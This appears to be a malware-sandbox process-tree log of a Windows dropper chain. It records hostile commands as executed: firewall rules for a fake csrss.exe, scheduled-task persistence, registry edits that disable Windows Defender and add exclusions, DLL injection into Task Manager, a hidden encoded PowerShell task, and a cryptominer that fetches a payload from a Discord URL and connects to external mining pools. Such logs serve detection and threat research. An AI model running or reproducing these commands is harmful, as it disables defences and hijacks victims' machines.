C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 7965⤵
- Program crash
PID:3996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8405⤵
- Program crash
PID:220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 6085⤵
- Program crash
PID:1796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8285⤵
- Program crash
PID:2808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8365⤵
- Program crash
PID:424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8325⤵
- Program crash
PID:4284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 6085⤵
- Program crash
PID:2384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 5645⤵
- Program crash
PID:3652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 7205⤵
- Program crash
PID:4700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 6765⤵
- Program crash
PID:1272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 2285⤵
- Program crash
PID:3480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 6485⤵
- Program crash
PID:2324
-
-
C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"C:\Users\Admin\Pictures\tWRDOwBPjdPxOfJwvJzJ05pQ.exe"5⤵PID:2232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 3286⤵
- Program crash
PID:3024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 6286⤵
- Program crash
PID:4668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 7086⤵
- Program crash
PID:1384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 7926⤵
- Program crash
PID:2336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 6926⤵
- Program crash
PID:3368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 6646⤵
- Program crash
PID:2748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 5846⤵
- Program crash
PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 3966⤵
- Program crash
PID:4040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 3486⤵
- Program crash
PID:4160
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:1840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2336
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3692
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵PID:2844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 3927⤵
- Program crash
PID:1512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 4727⤵
- Program crash
PID:4520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 6367⤵
- Program crash
PID:4432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 6807⤵
- Program crash
PID:1756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 7167⤵
- Program crash
PID:740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 6127⤵
- Program crash
PID:2376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 4127⤵
- Program crash
PID:3004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 7287⤵
- Program crash
PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 3847⤵
- Program crash
PID:2500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 8487⤵
- Program crash
PID:2284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4108
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:1068
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:2848
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:4736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 8807⤵
- Program crash
PID:1904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 8767⤵
- Program crash
PID:4788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 8687⤵
- Program crash
PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵PID:3368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 6767⤵
- Program crash
PID:4528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 9887⤵
- Program crash
PID:4040
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:1908
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵PID:612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 10127⤵
- Program crash
PID:1296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 10287⤵PID:1880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 7287⤵PID:2784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 11127⤵PID:4424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 11247⤵PID:3456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 10007⤵PID:380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 10767⤵PID:4520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 11687⤵PID:3168
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:4392
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:5480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 9927⤵PID:4616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 9687⤵PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:807⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --tls --nicehash -o showlock.net:443 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --tls --nicehash -o showlock.net:80 --rig-id ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --nicehash --http-port 3433 --http-access-token ac2c5766-c63c-4000-9d7d-ede88b4ebb27 --randomx-wrmsr=-18⤵PID:5552
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 55528⤵PID:5800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 3489⤵PID:5624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 3849⤵PID:4016
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 4609⤵PID:5184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6049⤵PID:1360
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 5729⤵PID:1464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6769⤵PID:5448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6049⤵PID:5192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6889⤵PID:5208
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:1680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12807⤵PID:3168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 13807⤵PID:5212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 13167⤵PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 13607⤵PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 14127⤵PID:4788
-
-
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵PID:4216
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4608
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:5088
-
-
-
-
C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"4⤵PID:1936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 4325⤵
- Program crash
PID:1352
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6525⤵
- Program crash
PID:1744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 7885⤵
- Program crash
PID:1880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6365⤵
- Program crash
PID:3376
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6525⤵
- Program crash
PID:2020
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 7125⤵
- Program crash
PID:1952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 6485⤵
- Program crash
PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 4165⤵
- Program crash
PID:4716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 3845⤵
- Program crash
PID:3692
-
-
C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"C:\Users\Admin\Pictures\K9LUequqNCUJChLdY7ffYqtv.exe"5⤵PID:3620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 3246⤵
- Program crash
PID:2244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 6326⤵
- Program crash
PID:1296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 6766⤵
- Program crash
PID:4976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 7726⤵
- Program crash
PID:1012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5606⤵
- Program crash
PID:4792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 6526⤵
- Program crash
PID:4436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5926⤵
- Program crash
PID:1748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 3686⤵
- Program crash
PID:4896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 3486⤵
- Program crash
PID:8
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2148
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3344
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5084
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:1108
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 8446⤵
- Program crash
PID:4404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 5806⤵
- Program crash
PID:1560
-
-
-
-
C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"4⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\is-GEQU1.tmp\ofO0kq3KHSooXJGY7KSuEiLf.tmp"C:\Users\Admin\AppData\Local\Temp\is-GEQU1.tmp\ofO0kq3KHSooXJGY7KSuEiLf.tmp" /SL5="$30348,140559,56832,C:\Users\Admin\Pictures\ofO0kq3KHSooXJGY7KSuEiLf.exe"5⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\is-9SJKF.tmp\444567.exe"C:\Users\Admin\AppData\Local\Temp\is-9SJKF.tmp\444567.exe" /S /UID=lylal2206⤵PID:4728
-
C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe"C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe" /VERYSILENT7⤵PID:3876
-
C:\Users\Admin\AppData\Local\Temp\is-SFM0N.tmp\lightcleaner.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFM0N.tmp\lightcleaner.tmp" /SL5="$603E0,833775,56832,C:\Program Files (x86)\Reference Assemblies\XVHNWITGAR\lightcleaner.exe" /VERYSILENT8⤵PID:1560
-
-
-
-
-
-
C:\Users\Admin\Pictures\17aV29QH6Rmgn47hVNowHB5G.exe"C:\Users\Admin\Pictures\17aV29QH6Rmgn47hVNowHB5G.exe"4⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe5⤵PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\nsmF872.tmpC:\Users\Admin\AppData\Local\Temp\nsmF872.tmp5⤵PID:3464
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsmF872.tmp" & del "C:\ProgramData\*.dll"" & exit6⤵PID:5324
-
C:\Windows\SysWOW64\timeout.exetimeout /t 57⤵
- Delays execution with timeout.exe
PID:5136
-
-
-
-
-
C:\Users\Admin\Pictures\1rfVzdez8rjv7xiJyUjZRMvg.exe"C:\Users\Admin\Pictures\1rfVzdez8rjv7xiJyUjZRMvg.exe"4⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\7zS72A2.tmp\Install.exe.\Install.exe5⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\7zS7457.tmp\Install.exe.\Install.exe /UdidKIT "385118" /S6⤵PID:200
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:4144
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:2924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXHqnkEfc"7⤵PID:1068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXHqnkEfc" /SC once /ST 09:57:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:4404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQqfrfOcqJXaOOvqOO" /SC once /ST 15:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe\" pA /gDsite_idWIs 385118 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:4108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXHqnkEfc"7⤵PID:2512
-
-
-
-
-
C:\Users\Admin\Pictures\UBjvCSWLu2Wgo8xdGwh8QoUE.exe"C:\Users\Admin\Pictures\UBjvCSWLu2Wgo8xdGwh8QoUE.exe"4⤵PID:3052
-
-
C:\Users\Admin\Pictures\xTc86FPYwI4av8HXSuO6jsPd.exe"C:\Users\Admin\Pictures\xTc86FPYwI4av8HXSuO6jsPd.exe"4⤵PID:3720
-
-
C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"4⤵PID:740
-
C:\Users\Admin\AppData\Local\Temp\is-54UO9.tmp\4ujLv5Z6YXMoxcYc6vqcHyMs.tmp"C:\Users\Admin\AppData\Local\Temp\is-54UO9.tmp\4ujLv5Z6YXMoxcYc6vqcHyMs.tmp" /SL5="$3046E,140559,56832,C:\Users\Admin\Pictures\4ujLv5Z6YXMoxcYc6vqcHyMs.exe"5⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\is-H6FRO.tmp\444567.exe"C:\Users\Admin\AppData\Local\Temp\is-H6FRO.tmp\444567.exe" /S /UID=lylal2206⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\2e-4dbe1-de7-f09b8-8401ead4f22e7\Tyhykepaesha.exe"C:\Users\Admin\AppData\Local\Temp\2e-4dbe1-de7-f09b8-8401ead4f22e7\Tyhykepaesha.exe"7⤵PID:5944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k 2cba948feb9c53fce4409f0079aec61c.exe & exit8⤵PID:6096
-
-
-
-
-
-
C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"4⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 3845⤵PID:5548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 3885⤵PID:6100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 4005⤵PID:5260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6205⤵PID:5308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6245⤵PID:6028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6925⤵PID:3608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 6485⤵PID:5776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 7045⤵PID:6044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 7805⤵PID:5832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5244
-
-
C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"C:\Users\Admin\Pictures\w6sfFLfRcpamULQjRy4TBVVh.exe"5⤵PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3486⤵PID:364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3246⤵PID:5244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 3286⤵PID:2384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 5926⤵
- Executes dropped EXE
PID:200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6286⤵PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6646⤵PID:2728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 5646⤵PID:5556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 6806⤵PID:6844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 7726⤵PID:7964
-
-
-
-
C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"4⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\is-CVOQL.tmp\xi86LmwZnIdpohyoS43cg6Jg.tmp"C:\Users\Admin\AppData\Local\Temp\is-CVOQL.tmp\xi86LmwZnIdpohyoS43cg6Jg.tmp" /SL5="$3047E,4472587,54272,C:\Users\Admin\Pictures\xi86LmwZnIdpohyoS43cg6Jg.exe"5⤵PID:1616
-
-
-
C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"4⤵PID:1676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 3845⤵PID:5608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 3885⤵PID:6056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 4285⤵PID:5144
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6205⤵PID:5932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6245⤵PID:5424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6925⤵PID:5328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 7085⤵PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 6925⤵PID:5612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 7805⤵PID:5880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:6108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608
-
-
-
C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"C:\Users\Admin\Pictures\p5DlgEMx5gYcoGktfGFhOQrx.exe"5⤵PID:5540
-
